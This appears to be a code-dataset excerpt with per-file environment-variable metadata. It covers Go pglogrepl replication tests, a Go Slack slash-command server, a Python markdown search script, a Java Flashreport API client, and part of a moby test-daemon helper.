"fmt"
"os"
"strconv"
"testing"
"time"
"github.com/jackc/pgconn"
"github.com/jackc/pglogrepl"
"github.com/jackc/pgproto3/v2"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
"github.com/stretchr/testify/suite"
)
func TestLSNSuite(t *testing.T) {
suite.Run(t, new(lsnSuite))
}
type lsnSuite struct {
suite.Suite
}
func (s *lsnSuite) R() *require.Assertions {
return s.Require()
}
func (s *lsnSuite) Equal(e, a interface{}, args ...interface{}) {
s.R().Equal(e, a, args...)
}
func (s *lsnSuite) NoError(err error) {
s.R().NoError(err)
}
func (s *lsnSuite) TestScannerInterface() {
var lsn pglogrepl.LSN
lsnText := "16/B374D848"
lsnUint64 := uint64(97500059720)
var err error
err = lsn.Scan(lsnText)
s.NoError(err)
s.Equal(lsnText, lsn.String())
err = lsn.Scan([]byte(lsnText))
s.NoError(err)
s.Equal(lsnText, lsn.String())
lsn = 0
err = lsn.Scan(lsnUint64)
s.NoError(err)
s.Equal(lsnText, lsn.String())
err = lsn.Scan(int64(lsnUint64))
s.Error(err)
s.T().Log(err)
}
func (s *lsnSuite) TestScanToNil() {
var lsnPtr *pglogrepl.LSN
err := lsnPtr.Scan("16/B374D848")
s.NoError(err)
}
func (s *lsnSuite) TestValueInterface() {
lsn := pglogrepl.LSN(97500059720)
driverValue, err := lsn.Value()
s.NoError(err)
lsnStr, ok := driverValue.(string)
s.R().True(ok)
s.Equal("16/B374D848", lsnStr)
}
const slotName = "pglogrepl_test"
const outputPlugin = "test_decoding"
func closeConn(t testing.TB, conn *pgconn.PgConn) {
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
defer cancel()
require.NoError(t, conn.Close(ctx))
}
func TestIdentifySystem(t *testing.T) {
ctx, cancel := context.WithTimeout(context.Background(), time.Second*5)
defer cancel()
conn, err := pgconn.Connect(ctx, os.Getenv("PGLOGREPL_TEST_CONN_STRING"))
require.NoError(t, err)
defer closeConn(t, conn)
sysident, err := pglogrepl.IdentifySystem(ctx, conn)
require.NoError(t, err)
assert.Greater(t, len(sysident.SystemID), 0)
assert.True(t, sysident.Timeline > 0)
assert.True(t, sysident.XLogPos > 0)
assert.Greater(t, len(sysident.DBName), 0)
}
func TestGetHistoryFile(t *testing.T) {
ctx, cancel := context.WithTimeout(context.Background(), time.Second*5)
defer cancel()
config, err := pgconn.ParseConfig(os.Getenv("PGLOGREPL_TEST_CONN_STRING"))
require.NoError(t, err)
config.RuntimeParams["replication"] = "on"
conn, err := pgconn.ConnectConfig(ctx, config)
require.NoError(t, err)
defer closeConn(t, conn)
sysident, err := pglogrepl.IdentifySystem(ctx, conn)
require.NoError(t, err)
tlh, err := pglogrepl.TimelineHistory(ctx, conn, 0)
require.Error(t, err)
tlh, err = pglogrepl.TimelineHistory(ctx, conn, 1)
require.Error(t, err)
if sysident.Timeline > 1 {
// This test requires a Postgres with at least 1 timeline increase (promote, or recover)...
tlh, err = pglogrepl.TimelineHistory(ctx, conn, sysident.Timeline)
require.NoError(t, err)
expectedFileName := fmt.Sprintf("%08X.history", sysident.Timeline)
assert.Equal(t, expectedFileName, tlh.FileName)
assert.Greater(t, len(tlh.Content), 0)
}
}
func TestCreateReplicationSlot(t *testing.T) {
ctx, cancel := context.WithTimeout(context.Background(), time.Second*5)
defer cancel()
conn, err := pgconn.Connect(ctx, os.Getenv("PGLOGREPL_TEST_CONN_STRING"))
require.NoError(t, err)
defer closeConn(t, conn)
result, err := pglogrepl.CreateReplicationSlot(ctx, conn, slotName, outputPlugin, pglogrepl.CreateReplicationSlotOptions{Temporary: true})
require.NoError(t, err)
assert.Equal(t, slotName, result.SlotName)
assert.Equal(t, outputPlugin, result.OutputPlugin)
}
func TestDropReplicationSlot(t *testing.T) {
ctx, cancel := context.WithTimeout(context.Background(), time.Second*5)
defer cancel()
conn, err := pgconn.Connect(ctx, os.Getenv("PGLOGREPL_TEST_CONN_STRING"))
require.NoError(t, err)
defer closeConn(t, conn)
_, err = pglogrepl.CreateReplicationSlot(ctx, conn, slotName, outputPlugin, pglogrepl.CreateReplicationSlotOptions{Temporary: true})
require.NoError(t, err)
err = pglogrepl.DropReplicationSlot(ctx, conn, slotName, pglogrepl.DropReplicationSlotOptions{})
require.NoError(t, err)
_, err = pglogrepl.CreateReplicationSlot(ctx, conn, slotName, outputPlugin, pglogrepl.CreateReplicationSlotOptions{Temporary: true})
require.NoError(t, err)
}
func TestStartReplication(t *testing.T) {
ctx, cancel := context.WithTimeout(context.Background(), time.Second*5)
defer cancel()
conn, err := pgconn.Connect(ctx, os.Getenv("PGLOGREPL_TEST_CONN_STRING"))
require.NoError(t, err)
defer closeConn(t, conn)
sysident, err := pglogrepl.IdentifySystem(ctx, conn)
require.NoError(t, err)
_, err = pglogrepl.CreateReplicationSlot(ctx, conn, slotName, outputPlugin, pglogrepl.CreateReplicationSlotOptions{Temporary: true})
require.NoError(t, err)
err = pglogrepl.StartReplication(ctx, conn, slotName, sysident.XLogPos, pglogrepl.StartReplicationOptions{})
require.NoError(t, err)
go func() {
ctx, cancel := context.WithTimeout(context.Background(), time.Second*5)
defer cancel()
config, err := pgconn.ParseConfig(os.Getenv("PGLOGREPL_TEST_CONN_STRING"))
require.NoError(t, err)
delete(config.RuntimeParams, "replication")
conn, err := pgconn.ConnectConfig(ctx, config)
require.NoError(t, err)
defer closeConn(t, conn)
_, err = conn.Exec(ctx, `
create table t(id int primary key, name text);
insert into t values (1, 'foo');
insert into t values (2, 'bar');
insert into t values (3, 'baz');
update t set name='quz' where id=3;
delete from t where id=2;
drop table t;
`).ReadAll()
require.NoError(t, err)
}()
rxKeepAlive := func() pglogrepl.PrimaryKeepaliveMessage {
msg, err := conn.ReceiveMessage(ctx)
require.NoError(t, err)
cdMsg, ok := msg.(*pgproto3.CopyData)
require.True(t, ok)
require.Equal(t, byte(pglogrepl.PrimaryKeepaliveMessageByteID), cdMsg.Data[0])
pkm, err := pglogrepl.ParsePrimaryKeepaliveMessage(cdMsg.Data[1:])
require.NoError(t, err)
return pkm
}
rxXLogData := func() pglogrepl.XLogData {
msg, err := conn.ReceiveMessage(ctx)
require.NoError(t, err)
cdMsg, ok := msg.(*pgproto3.CopyData)
require.True(t, ok)
require.Equal(t, byte(pglogrepl.XLogDataByteID), cdMsg.Data[0])
xld, err := pglogrepl.ParseXLogData(cdMsg.Data[1:])
require.NoError(t, err)
return xld
}
rxKeepAlive()
xld := rxXLogData()
assert.Equal(t, "BEGIN", string(xld.WALData[:5]))
xld = rxXLogData()
assert.Equal(t, "table public.t: INSERT: id[integer]:1 name[text]:'foo'", string(xld.WALData))
xld = rxXLogData()
assert.Equal(t, "table public.t: INSERT: id[integer]:2 name[text]:'bar'", string(xld.WALData))
xld = rxXLogData()
assert.Equal(t, "table public.t: INSERT: id[integer]:3 name[text]:'baz'", string(xld.WALData))
xld = rxXLogData()
assert.Equal(t, "table public.t: UPDATE: id[integer]:3 name[text]:'quz'", string(xld.WALData))
xld = rxXLogData()
assert.Equal(t, "table public.t: DELETE: id[integer]:2", string(xld.WALData))
xld = rxXLogData()
assert.Equal(t, "COMMIT", string(xld.WALData[:6]))
}
func TestStartReplicationPhysical(t *testing.T) {
ctx, cancel := context.WithTimeout(context.Background(), time.Second*50)
defer cancel()
conn, err := pgconn.Connect(ctx, os.Getenv("PGLOGREPL_TEST_CONN_STRING"))
require.NoError(t, err)
defer closeConn(t, conn)
sysident, err := pglogrepl.IdentifySystem(ctx, conn)
require.NoError(t, err)
_, err = pglogrepl.CreateReplicationSlot(ctx, conn, slotName, "", pglogrepl.CreateReplicationSlotOptions{Temporary: true, Mode: pglogrepl.PhysicalReplication})
require.NoError(t, err)
err = pglogrepl.StartReplication(ctx, conn, slotName, sysident.XLogPos, pglogrepl.StartReplicationOptions{Mode: pglogrepl.PhysicalReplication})
require.NoError(t, err)
go func() {
ctx, cancel := context.WithTimeout(context.Background(), time.Second*5)
defer cancel()
config, err := pgconn.ParseConfig(os.Getenv("PGLOGREPL_TEST_CONN_STRING"))
require.NoError(t, err)
delete(config.RuntimeParams, "replication")
conn, err := pgconn.ConnectConfig(ctx, config)
require.NoError(t, err)
defer closeConn(t, conn)
_, err = conn.Exec(ctx, `
create table mytable(id int primary key, name text);
drop table mytable;
`).ReadAll()
require.NoError(t, err)
}()
_ = func() pglogrepl.PrimaryKeepaliveMessage {
msg, err := conn.ReceiveMessage(ctx)
require.NoError(t, err)
cdMsg, ok := msg.(*pgproto3.CopyData)
require.True(t, ok)
require.Equal(t, byte(pglogrepl.PrimaryKeepaliveMessageByteID), cdMsg.Data[0])
pkm, err := pglogrepl.ParsePrimaryKeepaliveMessage(cdMsg.Data[1:])
require.NoError(t, err)
return pkm
}
rxXLogData := func() pglogrepl.XLogData {
msg, err := conn.ReceiveMessage(ctx)
require.NoError(t, err)
cdMsg, ok := msg.(*pgproto3.CopyData)
require.True(t, ok)
require.Equal(t, byte(pglogrepl.XLogDataByteID), cdMsg.Data[0])
xld, err := pglogrepl.ParseXLogData(cdMsg.Data[1:])
require.NoError(t, err)
return xld
}
xld := rxXLogData()
assert.Contains(t, string(xld.WALData), "mytable")
copyDoneResult, err := pglogrepl.SendStandbyCopyDone(ctx, conn)
require.NoError(t, err)
assert.Nil(t, copyDoneResult)
}
func TestBaseBackup(t *testing.T) {
// base backup test could take a long time. Therefore it can be disabled.
envSkipTest := os.Getenv("PGLOGREPL_SKIP_BASE_BACKUP")
if envSkipTest != "" {
skipTest, err := strconv.ParseBool(envSkipTest)
if err != nil {
t.Error(err)
} else if skipTest {
return
}
}
conn, err := pgconn.Connect(context.Background(), os.Getenv("PGLOGREPL_TEST_CONN_STRING"))
require.NoError(t, err)
defer closeConn(t, conn)
options := pglogrepl.BaseBackupOptions{
NoVerifyChecksums: true,
Progress: true,
Label: "pglogrepltest",
Fast: true,
WAL: true,
NoWait: true,
MaxRate: 1024,
TablespaceMap: true,
}
startRes, err := pglogrepl.StartBaseBackup(context.Background(), conn, options)
require.GreaterOrEqual(t, startRes.TimelineID, int32(1))
require.NoError(t, err)
//Write the tablespaces
for i := 0; i < len(startRes.Tablespaces)+1; i++ {
f, err := os.Create(fmt.Sprintf("/tmp/pglogrepl_test_tbs_%d.tar", i))
require.NoError(t, err)
err = pglogrepl.NextTableSpace(context.Background(), conn)
var message pgproto3.BackendMessage
L:
for {
message, err = conn.ReceiveMessage(context.Background())
require.NoError(t, err)
switch msg := message.(type) {
case *pgproto3.CopyData:
_, err := f.Write(msg.Data)
require.NoError(t, err)
case *pgproto3.CopyDone:
break L
default:
t.Errorf("Received unexpected message: %#v\n", msg)
}
}
err = f.Close()
require.NoError(t, err)
}
stopRes, err := pglogrepl.FinishBaseBackup(context.Background(), conn)
require.NoError(t, err)
require.Equal(t, startRes.TimelineID, stopRes.TimelineID)
require.Equal(t, len(stopRes.Tablespaces), 0)
require.Less(t, uint64(startRes.LSN), uint64(stopRes.LSN))
_, err = pglogrepl.StartBaseBackup(context.Background(), conn, options)
require.NoError(t, err)
}
func TestSendStandbyStatusUpdate(t *testing.T) {
ctx, cancel := context.WithTimeout(context.Background(), time.Second*5)
defer cancel()
conn, err := pgconn.Connect(ctx, os.Getenv("PGLOGREPL_TEST_CONN_STRING"))
require.NoError(t, err)
defer closeConn(t, conn)
sysident, err := pglogrepl.IdentifySystem(ctx, conn)
require.NoError(t, err)
err = pglogrepl.SendStandbyStatusUpdate(ctx, conn, pglogrepl.StandbyStatusUpdate{WALWritePosition: sysident.XLogPos})
require.NoError(t, err)
}
|
[
"\"PGLOGREPL_TEST_CONN_STRING\"",
"\"PGLOGREPL_TEST_CONN_STRING\"",
"\"PGLOGREPL_TEST_CONN_STRING\"",
"\"PGLOGREPL_TEST_CONN_STRING\"",
"\"PGLOGREPL_TEST_CONN_STRING\"",
"\"PGLOGREPL_TEST_CONN_STRING\"",
"\"PGLOGREPL_TEST_CONN_STRING\"",
"\"PGLOGREPL_TEST_CONN_STRING\"",
"\"PGLOGREPL_SKIP_BASE_BACKUP\"",
"\"PGLOGREPL_TEST_CONN_STRING\"",
"\"PGLOGREPL_TEST_CONN_STRING\""
] |
[] |
[
"PGLOGREPL_SKIP_BASE_BACKUP",
"PGLOGREPL_TEST_CONN_STRING"
] |
[]
|
["PGLOGREPL_SKIP_BASE_BACKUP", "PGLOGREPL_TEST_CONN_STRING"]
|
go
| 2 | 0 | |
main.go
|
package main
import (
"encoding/json"
"errors"
"fmt"
"io/ioutil"
"log"
"net/http"
"net/url"
"os"
"github.com/jesselucas/slackcmd/commands/beats1"
"github.com/jesselucas/slackcmd/commands/calendar"
"github.com/jesselucas/slackcmd/commands/qotd"
"github.com/jesselucas/slackcmd/commands/trello"
"github.com/jesselucas/slackcmd/slack"
)
// struct used to store environment variables from config.json
type env struct {
Key string
Value string
}
func main() {
// setup environment variables if a config json exist
setEnvFromJSON("config.json")
// url setup. FIX make more generic
var url string
if os.Getenv("PORT") != "" {
url = ":" + os.Getenv("PORT")
} else {
url = "localhost:8080"
}
// vs := validateSlackToken(http.HandlerFunc(commandHandler), slackAPIKey)
http.HandleFunc("/cmd/", commandHandler)
http.HandleFunc("/cmd", commandHandler)
http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
fmt.Fprint(w, "Go away!")
})
log.Fatal(http.ListenAndServe(url, nil))
}
func setEnvFromJSON(configPath string) {
configFile, err := ioutil.ReadFile(configPath)
if err != nil {
fmt.Println("config.json not found. Using os environment variables.")
return
}
var envVars []env
json.Unmarshal(configFile, &envVars)
// set environment variables
for _, env := range envVars {
// fmt.Println(env)
os.Setenv(env.Key, env.Value)
}
}
func createSlashCommand(w http.ResponseWriter, r *http.Request) *slack.SlashCommand {
var v url.Values
switch r.Method {
case "POST":
r.ParseForm()
v = r.Form
case "GET":
v = r.URL.Query()
}
sc := &slack.SlashCommand{
Token: v.Get("token"),
TeamId: v.Get("team_id"),
TeamDomain: v.Get("team_domain"),
ChannelId: v.Get("channel_id"),
ChannelName: v.Get("channel_name"),
UserId: v.Get("user_id"),
UserName: v.Get("user_name"),
Command: v.Get("command"),
Text: v.Get("text"),
Hook: v.Get("hook"),
}
return sc
}
func commandHandler(w http.ResponseWriter, r *http.Request) {
sc := createSlashCommand(w, r)
// interface reference for slack Commands
var cmd slack.Command
// Create FlagSet to store flags
fs := &slack.FlagSet{}
// Add commands here
switch sc.Command {
case "/fg":
cmd = &trello.Command{}
fs.Usage = "/fg help: FG Trello access"
case "/beats1":
cmd = &beats1.Command{}
fs.Usage = "/beats1 help: Song currently playing on Beats1"
case "/conference":
cmd = &calendar.Command{}
fs.Usage = "/conference help: Schedule for FG Conference room"
case "/qotd":
cmd = &qotd.Command{}
fs.Usage = "/qotd help: Sends the Question of the Day"
default:
err := errors.New("No Command found")
http.Error(w, err.Error(), http.StatusForbidden)
return
}
fmt.Println("slash command:", sc.Text)
// parse out flags
parsedCommands, flags := slack.SeparateFlags(sc.Text)
sc.Text = parsedCommands
// command request returns payload
cp, err := cmd.Request(sc)
if cp == nil {
err := errors.New("Unauthorized")
http.Error(w, err.Error(), http.StatusForbidden)
return
}
if err != nil {
err := errors.New("Unauthorized")
http.Error(w, err.Error(), http.StatusForbidden)
return
}
// Set Flags for Commands
slack.SetFlag(fs, "channel", "c", "Sends the response to the current channel", func() {
cp.Channel = fmt.Sprintf("#%v", sc.ChannelName)
cp.SendPayload = true
cp.SlashResponse = false
})
slack.SetFlag(fs, "private", "p", "Sends a private message with the response", func() {
cp.SendPayload = true
cp.SlashResponse = false
})
sc.Text = parsedCommands
// TODO: Move ParseFlags call so it happen before cmd.Request is called
help, response := slack.ParseFlags(fs, flags)
if help == true {
cp.Text = response
}
// check if the command wants to send a slash command response
if cp.SlashResponse {
w.Write([]byte(cp.Text))
}
// don't send payload if hook URL isn't passed
if sc.Hook != "" && cp.SendPayload == true {
cpJSON, err := json.Marshal(cp)
if err != nil {
err := errors.New("Unauthorized")
http.Error(w, err.Error(), http.StatusForbidden)
return
}
cpJSONString := string(cpJSON[:])
// Make the request to the Slack API.
http.PostForm(sc.Hook, url.Values{"payload": {cpJSONString}})
}
}
|
[
"\"PORT\"",
"\"PORT\""
] |
[] |
[
"PORT"
] |
[]
|
["PORT"]
|
go
| 1 | 0 | |
common/tools/findPNG/findPNG.py
|
import glob
import sys
import re
import os
# Change to learning-library path
src=os.path.dirname(os.path.dirname(os.path.dirname(os.getcwd())))
all_manis = []
string_to_search=sys.argv[1]
home_dir = os.environ['HOME']
csv_file='md_list.csv'
csv_dir = os.path.join(home_dir,csv_file)
file_number=0
destination = open(csv_dir, 'w')
destination.write('number,markdown \n')
#Find all .md and store in list
for f in glob.glob(src + '/**/*.md', recursive=True):
all_manis.append(f)
#Iterate through list and do for every .md
for mani in all_manis:
#print('Working on ' + mani)
aFile = mani
source= open(aFile, 'r' )
for line in source:
if string_to_search in line:
m = re.search('/(learning-library.*)', aFile)
if m:
path2manifest = m.group(1)
file_number += 1
print(aFile)
destination.write(str(file_number) + ',' + path2manifest + '\n')
source.close()
|
[] |
[] |
[
"HOME"
] |
[]
|
["HOME"]
|
python
| 1 | 0 | |
src/main/java/io/flashreport/cfspring/integration/FlashreportClient.java
|
package io.flashreport.cfspring.integration;
import com.fasterxml.jackson.databind.JsonNode;
import com.fasterxml.jackson.databind.ObjectMapper;
import org.springframework.http.*;
import org.springframework.web.client.RestTemplate;
import java.io.IOException;
import java.net.URI;
import java.net.URISyntaxException;
import java.util.Base64;
/**
* Simple client to send report generation requests to flashreport.io, as well as getting information
* about a report request.
* <p>
* The flashreport api key is extracted from the VCAP_SERVICES environment variable, which is set by Cloud Foundry.
* <p>
* Created by Nicolas Lejeune on 18/06/15.
*/
public class FlashreportClient {
private static final String CREATE_URL = "https://gateway.flashreport.io/api/v1/report/new";
private static final String BASE_URL = "https://gateway.flashreport.io/api/v1/report/";
private String API_KEY;
/**
* Request the generation of a report with the specified content.
*
* @param content json or xml data
* @return the URI representing the report
*/
public URI generateReport(String content) {
return generateReport(content, null, null);
}
/**
* Request the generation of a report with the specified content and title.
*
* @param content json or xml data
* @param title a title for your report
* @return the URI representing the report
*/
public URI generateReport(String content, String title) {
return generateReport(content, title, null);
}
/**
* Request the generation of a report with the specified content, title and template.
* The template must have been previously registered in the dashboard.
*
* @param content json or xml data
* @param title a title for your report
* @return the URI representing the report
*/
public URI generateReport(String content, String title, String template) {
RestTemplate restTemplate = new RestTemplate();
HttpEntity entityWithBody = new HttpEntity<>(content, getHeaders());
String url = CREATE_URL;
if (title != null) url += "?title=" + title;
if (title != null && template != null) url += "&template=" + template;
if (title == null && template != null) url += "?template=" + template;
ResponseEntity<String> response = restTemplate.exchange(url, HttpMethod.POST, entityWithBody, String.class);
if (response.getStatusCode().equals(HttpStatus.CREATED)) {
return response.getHeaders().getLocation();
} else {
throw new RuntimeException("Received unexpected response code : " + response.getStatusCode());
}
}
public String getStorageUrl(String uuid) {
HttpEntity entity = new HttpEntity<>(getHeaders());
RestTemplate restTemplate = new RestTemplate();
ResponseEntity<String> response = restTemplate.exchange(BASE_URL + uuid + "/storage", HttpMethod.GET, entity, String.class);
if (response.getStatusCode().equals(HttpStatus.OK)) {
return response.getBody();
} else {
throw new RuntimeException("Received unexpected response code : " + response.getStatusCode());
}
}
public ReportStatus getReportStatus(String uuid) {
try {
return getReportStatus(new URI(BASE_URL + uuid));
} catch (URISyntaxException e) {
throw new IllegalArgumentException("Unable to construct a uri with report uuid [" + uuid + "]");
}
}
public ReportStatus getReportStatus(URI reportUri) {
HttpEntity entity = new HttpEntity<>(getHeaders());
RestTemplate restTemplate = new RestTemplate();
ResponseEntity<String> response = restTemplate.exchange(reportUri, HttpMethod.GET, entity, String.class);
if (response.getStatusCode().equals(HttpStatus.OK)) {
ObjectMapper mapper = new ObjectMapper();
ReportStatus status;
try {
status = mapper.readValue(response.getBody(), ReportStatus.class);
} catch (IOException e) {
throw new RuntimeException("Could not parse response body : " + response.getBody());
}
return status;
} else {
throw new RuntimeException("Received unexpected response code : " + response.getStatusCode());
}
}
private String extractApiKey() throws IllegalStateException {
if (API_KEY != null) return API_KEY;
String vcap_services = System.getenv("VCAP_SERVICES");
if (vcap_services == null) {
throw new IllegalStateException("Unable to get VCAP_SERVICES from environment.");
}
try {
ObjectMapper objectMapper = new ObjectMapper();
JsonNode jsonNode = objectMapper.readValue(vcap_services, JsonNode.class);
API_KEY = jsonNode.get("flashreport").get(0).get("credentials").get("apiKey").asText();
} catch (IOException | NullPointerException e) {
throw new IllegalStateException(
"Unable to extract api key from VCAP_SERVICES. Did you bind a flashreport service to your app?");
}
return API_KEY;
}
private HttpHeaders getHeaders() {
HttpHeaders httpHeaders = new HttpHeaders();
String basicHeader = "Basic " + Base64.getEncoder().encodeToString((extractApiKey() + ":").getBytes());
httpHeaders.add("Authorization", basicHeader);
return httpHeaders;
}
}
|
[
"\"VCAP_SERVICES\""
] |
[] |
[
"VCAP_SERVICES"
] |
[]
|
["VCAP_SERVICES"]
|
java
| 1 | 0 | |
internal/test/daemon/daemon.go
|
package daemon // import "moby/internal/test/daemon"
import (
"context"
"encoding/json"
"fmt"
"io/ioutil"
"net/http"
"os"
"os/exec"
"path/filepath"
"strconv"
"strings"
"time"
"moby/api/types"
"moby/api/types/events"
"moby/client"
"moby/internal/test"
"moby/internal/test/request"
"moby/opts"
"moby/pkg/ioutils"
"moby/pkg/stringid"
"github.com/docker/go-connections/sockets"
"github.com/docker/go-connections/tlsconfig"
"github.com/pkg/errors"
"gotest.tools/assert"
)
type testingT interface {
assert.TestingT
logT
Fatalf(string, ...interface{})
}
type logT interface {
Logf(string, ...interface{})
}
const defaultDockerdBinary = "dockerd"
var errDaemonNotStarted = errors.New("daemon not started")
// SockRoot holds the path of the default docker integration daemon socket
var SockRoot = filepath.Join(os.TempDir(), "docker-integration")
type clientConfig struct {
transport *http.Transport
scheme string
addr string
}
// Daemon represents a Docker daemon for the testing framework
type Daemon struct {
GlobalFlags []string
Root string
Folder string
Wait chan error
UseDefaultHost bool
UseDefaultTLSHost bool
id string
logFile *os.File
cmd *exec.Cmd
storageDriver string
userlandProxy bool
execRoot string
experimental bool
init bool
dockerdBinary string
log logT
// swarm related field
swarmListenAddr string
SwarmPort int // FIXME(vdemeester) should probably not be exported
DefaultAddrPool []string
SubnetSize uint32
// cached information
CachedInfo types.Info
}
// New returns a Daemon instance to be used for testing.
// This will create a directory such as d123456789 in the folder specified by $DOCKER_INTEGRATION_DAEMON_DEST or $DEST.
// The daemon will not automatically start.
func New(t testingT, ops ...func(*Daemon)) *Daemon {
if ht, ok := t.(test.HelperT); ok {
ht.Helper()
}
dest := os.Getenv("DOCKER_INTEGRATION_DAEMON_DEST")
if dest == "" {
dest = os.Getenv("DEST")
}
assert.Check(t, dest != "", "Please set the DOCKER_INTEGRATION_DAEMON_DEST or the DEST environment variable")
storageDriver := os.Getenv("DOCKER_GRAPHDRIVER")
assert.NilError(t, os.MkdirAll(SockRoot, 0700), "could not create daemon socket root")
id := fmt.Sprintf("d%s", stringid.TruncateID(stringid.GenerateRandomID()))
dir := filepath.Join(dest, id)
daemonFolder, err := filepath.Abs(dir)
assert.NilError(t, err, "Could not make %q an absolute path", dir)
daemonRoot := filepath.Join(daemonFolder, "root")
assert.NilError(t, os.MkdirAll(daemonRoot, 0755), "Could not create daemon root %q", dir)
userlandProxy := true
if env := os.Getenv("DOCKER_USERLANDPROXY"); env != "" {
if val, err := strconv.ParseBool(env); err != nil {
userlandProxy = val
}
}
d := &Daemon{
id: id,
Folder: daemonFolder,
Root: daemonRoot,
storageDriver: storageDriver,
userlandProxy: userlandProxy,
execRoot: filepath.Join(os.TempDir(), "docker-execroot", id),
dockerdBinary: defaultDockerdBinary,
swarmListenAddr: defaultSwarmListenAddr,
SwarmPort: DefaultSwarmPort,
log: t,
}
for _, op := range ops {
op(d)
}
return d
}
// RootDir returns the root directory of the daemon.
func (d *Daemon) RootDir() string {
return d.Root
}
// ID returns the generated id of the daemon
func (d *Daemon) ID() string {
return d.id
}
// StorageDriver returns the configured storage driver of the daemon
func (d *Daemon) StorageDriver() string {
return d.storageDriver
}
// Sock returns the socket path of the daemon
func (d *Daemon) Sock() string {
return fmt.Sprintf("unix://" + d.sockPath())
}
func (d *Daemon) sockPath() string {
return filepath.Join(SockRoot, d.id+".sock")
}
// LogFileName returns the path the daemon's log file
func (d *Daemon) LogFileName() string {
return d.logFile.Name()
}
// ReadLogFile returns the content of the daemon log file
func (d *Daemon) ReadLogFile() ([]byte, error) {
return ioutil.ReadFile(d.logFile.Name())
}
// NewClient creates new client based on daemon's socket path
// FIXME(vdemeester): replace NewClient with NewClientT
func (d *Daemon) NewClient() (*client.Client, error) {
return client.NewClientWithOpts(
client.FromEnv,
client.WithHost(d.Sock()))
}
// NewClientT creates new client based on daemon's socket path
// FIXME(vdemeester): replace NewClient with NewClientT
func (d *Daemon) NewClientT(t assert.TestingT) *client.Client {
if ht, ok := t.(test.HelperT); ok {
ht.Helper()
}
c, err := client.NewClientWithOpts(
client.FromEnv,
client.WithHost(d.Sock()))
assert.NilError(t, err, "cannot create daemon client")
return c
}
// Cleanup cleans the daemon files : exec root (network namespaces, ...), swarmkit files
func (d *Daemon) Cleanup(t testingT) {
if ht, ok := t.(test.HelperT); ok {
ht.Helper()
}
// Cleanup swarmkit wal files if present
cleanupRaftDir(t, d.Root)
cleanupNetworkNamespace(t, d.execRoot)
}
// Start starts the daemon and return once it is ready to receive requests.
func (d *Daemon) Start(t testingT, args ...string) {
if ht, ok := t.(test.HelperT); ok {
ht.Helper()
}
if err := d.StartWithError(args...); err != nil {
t.Fatalf("failed to start daemon with arguments %v : %v", args, err)
}
}
// StartWithError starts the daemon and return once it is ready to receive requests.
// It returns an error in case it couldn't start.
func (d *Daemon) StartWithError(args ...string) error {
logFile, err := os.OpenFile(filepath.Join(d.Folder, "docker.log"), os.O_RDWR|os.O_CREATE|os.O_APPEND, 0600)
if err != nil {
return errors.Wrapf(err, "[%s] Could not create %s/docker.log", d.id, d.Folder)
}
return d.StartWithLogFile(logFile, args...)
}
// StartWithLogFile will start the daemon and attach its streams to a given file.
func (d *Daemon) StartWithLogFile(out *os.File, providedArgs ...string) error {
d.handleUserns()
dockerdBinary, err := exec.LookPath(d.dockerdBinary)
if err != nil {
return errors.Wrapf(err, "[%s] could not find docker binary in $PATH", d.id)
}
args := append(d.GlobalFlags,
"--containerd", "/var/run/docker/containerd/docker-containerd.sock",
"--data-root", d.Root,
"--exec-root", d.execRoot,
"--pidfile", fmt.Sprintf("%s/docker.pid", d.Folder),
fmt.Sprintf("--userland-proxy=%t", d.userlandProxy),
)
if d.experimental {
args = append(args, "--experimental")
}
if d.init {
args = append(args, "--init")
}
if !(d.UseDefaultHost || d.UseDefaultTLSHost) {
args = append(args, []string{"--host", d.Sock()}...)
}
if root := os.Getenv("DOCKER_REMAP_ROOT"); root != "" {
args = append(args, []string{"--userns-remap", root}...)
}
// If we don't explicitly set the log-level or debug flag(-D) then
// turn on debug mode
foundLog := false
foundSd := false
for _, a := range providedArgs {
if strings.Contains(a, "--log-level") || strings.Contains(a, "-D") || strings.Contains(a, "--debug") {
foundLog = true
}
if strings.Contains(a, "--storage-driver") {
foundSd = true
}
}
if !foundLog {
args = append(args, "--debug")
}
if d.storageDriver != "" && !foundSd {
args = append(args, "--storage-driver", d.storageDriver)
}
args = append(args, providedArgs...)
d.cmd = exec.Command(dockerdBinary, args...)
d.cmd.Env = append(os.Environ(), "DOCKER_SERVICE_PREFER_OFFLINE_IMAGE=1")
d.cmd.Stdout = out
d.cmd.Stderr = out
d.logFile = out
if err := d.cmd.Start(); err != nil {
return errors.Errorf("[%s] could not start daemon container: %v", d.id, err)
}
wait := make(chan error)
go func() {
wait <- d.cmd.Wait()
d.log.Logf("[%s] exiting daemon", d.id)
close(wait)
}()
d.Wait = wait
tick := time.Tick(500 * time.Millisecond)
// make sure daemon is ready to receive requests
startTime := time.Now().Unix()
for {
d.log.Logf("[%s] waiting for daemon to start", d.id)
if time.Now().Unix()-startTime > 5 {
// After 5 seconds, give up
return errors.Errorf("[%s] Daemon exited and never started", d.id)
}
select {
case <-time.After(2 * time.Second):
return errors.Errorf("[%s] timeout: daemon does not respond", d.id)
case <-tick:
clientConfig, err := d.getClientConfig()
if err != nil {
return err
}
client := &http.Client{
Transport: clientConfig.transport,
}
req, err := http.NewRequest("GET", "/_ping", nil)
if err != nil {
return errors.Wrapf(err, "[%s] could not create new request", d.id)
}
req.URL.Host = clientConfig.addr
req.URL.Scheme = clientConfig.scheme
resp, err := client.Do(req)
if err != nil {
continue
}
resp.Body.Close()
if resp.StatusCode != http.StatusOK {
d.log.Logf("[%s] received status != 200 OK: %s\n", d.id, resp.Status)
}
d.log.Logf("[%s] daemon started\n", d.id)
d.Root, err = d.queryRootDir()
if err != nil {
return errors.Errorf("[%s] error querying daemon for root directory: %v", d.id, err)
}
return nil
case err := <-d.Wait:
return errors.Errorf("[%s] Daemon exited during startup: %v", d.id, err)
}
}
}
// StartWithBusybox will first start the daemon with Daemon.Start()
// then save the busybox image from the main daemon and load it into this Daemon instance.
func (d *Daemon) StartWithBusybox(t testingT, arg ...string) {
if ht, ok := t.(test.HelperT); ok {
ht.Helper()
}
d.Start(t, arg...)
d.LoadBusybox(t)
}
// Kill will send a SIGKILL to the daemon
func (d *Daemon) Kill() error {
if d.cmd == nil || d.Wait == nil {
return errDaemonNotStarted
}
defer func() {
d.logFile.Close()
d.cmd = nil
}()
if err := d.cmd.Process.Kill(); err != nil {
return err
}
return os.Remove(fmt.Sprintf("%s/docker.pid", d.Folder))
}
// Pid returns the pid of the daemon
func (d *Daemon) Pid() int {
return d.cmd.Process.Pid
